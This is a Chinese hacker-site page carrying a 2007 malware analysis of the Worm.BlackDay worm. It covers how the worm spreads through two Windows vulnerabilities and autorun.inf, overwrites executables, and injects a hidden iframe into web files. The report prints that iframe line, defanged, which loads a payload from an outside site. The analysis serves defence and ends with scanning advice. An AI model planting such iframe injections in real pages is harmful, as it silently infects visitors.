黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 网管频道 >> 安全应用 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[组图]Worm.BlackDay 病毒分析报告
      ★★★★

Worm.BlackDay 病毒分析报告

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-5-6 8:48:27

今日一朋友问起“末日阴影”,还以为是哪部好莱坞大片,细看下来,原来就是Worm/BlackDay这个“老”蠕虫。其实这个蠕虫在四月初就出现了,被冠了这么个噱头名字。

目前这个病毒会影响到除Windows Vista外所有的Windows版本。病毒程序运行后会破坏正常文件,感染网页文件,通过MS06-014和MS07-017漏洞传播, 且被病毒破坏的文件无法修复,这点比较危险。

1、当系统中毒后,所有可执行文件图标都变成了一个黑色炸弹的图标,如下图:

用户一旦感染该病毒,电脑会自动弹出一个病毒作者的留言框:

2、病毒体内有如下字样:

I can't change my sanguinary inbeing,never.I canfeel that the tears come by my face.Kill 
my self is the best,maybe.so Please.
My Name:wswhacker My age:17
I feeling free when I am not in prison.Can you feel my word?

(但此段文字在不同的版本里会有些许不同。)

3、该病毒会遍历本地磁盘、可移动磁盘等存贮介质,发现有*.asp *.aspx *.php *.jsp *.htm *.html扩展名的脚本文件时进行感染:

在这些网页脚本文件中插入一个Iframe标签,添加恶意网址引用:

(iframe src="hxxp://www.d***youxi.net/Black-Day.htm" width=0 height=0)(/iframe)

当用户打开这些网页文件时,IE就会自动下载蠕虫病毒。

(既然病毒目标是所有本地磁盘,查杀时就要注意全盘扫描。)

4、发现如下扩展名的文件时,将病毒体内容覆盖到文件首部,使文件被破坏,无法恢复:

.exe .msc .dll .scr .pif .com

发现如下扩展名的文件时跳过:

.lnk

对于其他文件,当文件大小小于258048(病毒体大小)时,覆盖文件,否则跳过。感染后的文件末尾加如下感染标志:wswhacker。

5、在每个磁盘根目录下创建如下病毒文件,双击盘符时激活病毒:

autorun.inf
BLACK-DAY.EXE

这样就可以借助U盘,MP3,移动硬盘等移动存储介质传播。

此病毒虽然对文件的破坏力比较强,好在传染性一般。目前还没有大规模的中毒报告。

建议开启文件、网页等监控,可以随时监控病毒对上述文件实施的更改操作。插入移动存储后,扫描移动磁盘后再运行文件。

【提示:为安全起见,文中用“*”代替了部分网址,并更改了Iframe标签格式。】

文章录入:cainiaowang    责任编辑:cainiaowang 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886